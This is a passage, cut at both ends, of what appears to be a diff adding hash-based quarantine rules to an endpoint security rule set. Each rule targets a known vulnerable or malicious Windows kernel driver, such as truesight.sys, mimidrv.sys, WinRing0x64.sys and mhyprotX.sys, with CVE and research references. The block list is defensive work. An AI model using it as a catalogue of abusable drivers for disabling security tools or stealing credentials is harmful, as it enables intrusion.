"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609778Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa0a1de59d8697c5f39937edeb778fde7c596b71d64d3427c80fe4c060488990", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "97f330cc-c639-59d0-a317-d5e284fc011e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454681Z", + "creation_date": "2026-03-23T11:45:30.454684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454694Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16360ead229b13deb47bc2bef40f282474c9f18c213c636cdfb8cc2495168251", + "comment": "Vulnerable Kernel Driver (aka inpout32.sys) [https://www.loldrivers.io/drivers/97fa88f6-3819-4d56-a82c-52a492a9e2b5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "980692a7-4c61-57d0-886e-dd8834c9972f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978934Z", + "creation_date": "2026-03-23T11:45:29.978936Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978948Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3", + "comment": "Vulnerable Kernel Driver (aka Black.sys) [https://www.loldrivers.io/drivers/4b047bb8-c605-4664-baed-25bb70e864a1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "980bc68d-00c6-5359-a3cc-1fdbe8a9cd69", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142273Z", + "creation_date": "2026-03-23T11:45:31.142275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91d9c3744283f31c43f10a876561d6700f3be19518b853ea2709fda9105427b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98163504-9b9b-563c-80ca-25a543fbb298", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480903Z", + "creation_date": "2026-03-23T11:45:30.480905Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480911Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "506f56996fbcd34ff8a27e6948a2e2e21e6dbf42dab6e3a6438402000b969fd1", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98173fa1-f433-56cd-8ffe-3eb14597a7bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494923Z", + "creation_date": "2026-03-23T11:45:31.494925Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494931Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "544e22290e9fba525d2b2df5e3414dffeab7bcc35a87fa18f46a00eab18aeb33", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9818331a-6327-53d6-9d6a-48d7852fa471", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150303Z", + "creation_date": "2026-03-23T11:45:31.150305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150311Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b5ecb39dafef2cff4b537cd59926f522cf6bf10e01bb28100e6250ffc3cbf9a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "981c6eb3-abaa-5df6-945c-dc0f6c45cf73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146302Z", + "creation_date": 
"2026-03-23T11:45:32.146306Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146311Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fcae081ec5093f2f794e0fe32456a07d2294decea356ba84f5ca7c0af407b671", + "comment": "Vulnerable Kernel Driver (aka ampa.sys) [https://www.loldrivers.io/drivers/ea0e7351-b65c-4c5a-9863-83b9d5efcec3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "981e9404-386b-5f2d-ace0-1dda94f9fe31", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143399Z", + "creation_date": "2026-03-23T11:45:31.143401Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143406Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f1838791999449fc15002e3330be19ce6b75b26ddfda132c5b37eefc72526c67", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "981fade0-290c-5433-a590-4d5afb3c4c24", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468889Z", + "creation_date": "2026-03-23T11:45:30.468892Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468901Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0feb05a7cc11793d995c920779cffeae68afabc54ffa8d8c361e5ba44fa57c8e", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9820a6f1-ae4c-5ae9-a127-d631309e005f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140672Z", + "creation_date": "2026-03-23T11:45:31.140673Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140679Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8989e81bbf4a0952dac26a326e2defad8d36dc1848a095ddceb19d9e443324d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9823f788-3c66-5e83-8bb0-ee6661f477ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154570Z", + "creation_date": "2026-03-23T11:45:31.154572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6a638c49b088c9abe20b7e882ddb0924ebd55330d412272e0c7b953bc2357e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98279125-1391-5a8e-bd72-8760392948cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826474Z", + "creation_date": "2026-03-23T11:45:31.826475Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a30e3faa2799870ce719d9c56250454cc3c91508a42ed39b44b81c0d6e8cfc94", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "982d1884-55c3-5868-9391-34d4ed0900de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487684Z", + "creation_date": "2026-03-23T11:45:31.487686Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9475319aa880489e6eec14e3d66501fc83be4395e07c4927666166fd4ece0021", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9855b557-535b-5391-8a12-75d1bce128a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975855Z", + "creation_date": "2026-03-23T11:45:29.975859Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975867Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2353030d4ea3ad9e874a0f7ff35bbfa10562c98c949d88cabab27102bbb8e48", + "comment": "Gigabyte vulnerable driver (aka GVCIDrv64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "985ac503-7706-5cda-857f-653a0fe2d26c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622810Z", + "creation_date": "2026-03-23T11:45:29.622812Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622817Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3a215473d836c1d7315f371bff4dea956d7d1b440e43b4671f6e3772bae00dd", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98716085-24c3-539f-ac5a-dc345fc05b5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829115Z", + "creation_date": "2026-03-23T11:45:30.829117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829122Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "122914d3e9b1a490871c4bbad1d5e7b5da9365fa1b34fac02c86873b2008770c", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9884c5f5-0f98-5244-85a7-09bada13d9e8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817626Z", + "creation_date": "2026-03-23T11:45:30.817628Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817634Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3a191ccd1df19cdf17fe6637d48266ac84c4310b013ad6973d8cb336b06ff69", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98871817-2288-55f3-a5c2-2eae8c0e39b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967344Z", + 
"creation_date": "2026-03-23T11:45:29.967346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967351Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98949474-b29d-518b-9c62-bfb084086ccf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464118Z", + "creation_date": "2026-03-23T11:45:30.464121Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b169a5f643524d59330fafe6e3e328e2179fc5116ee6fae5d39581467d53ac03", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98960ee9-4fd4-59f4-a2c8-50e6d490d40b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498712Z", + "creation_date": "2026-03-23T11:45:31.498715Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498724Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "770c2dfb24bba62e826160247e0a99152da04d27e8b6e115a3f474367cb9ee9d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9897001c-21d3-5425-b60f-3523835af690", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617237Z", + "creation_date": "2026-03-23T11:45:29.617239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.617245Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b845e5e43ce9e9b645ac198549e81f45c08197aad69708d96cdb9a719eb0e29", + "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "989c0ab7-a942-5f7d-a300-58639fe30fe2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827479Z", + "creation_date": "2026-03-23T11:45:31.827482Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827487Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bb2b1b6160b22aec3cf19a98d196c84eba631c6f834f62ad2446e59ff3a036f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98a10276-5ee4-5849-b8a9-dae4ee9c2250", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612127Z", + "creation_date": "2026-03-23T11:45:29.612129Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612136Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f18605a691056b446c6411b7fa841b8178059bde8094cfe9013e59f4663cdf7f", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "98a659ff-17ff-5c38-95da-995b3f7d75e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155718Z", + "creation_date": "2026-03-23T11:45:31.155720Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155726Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
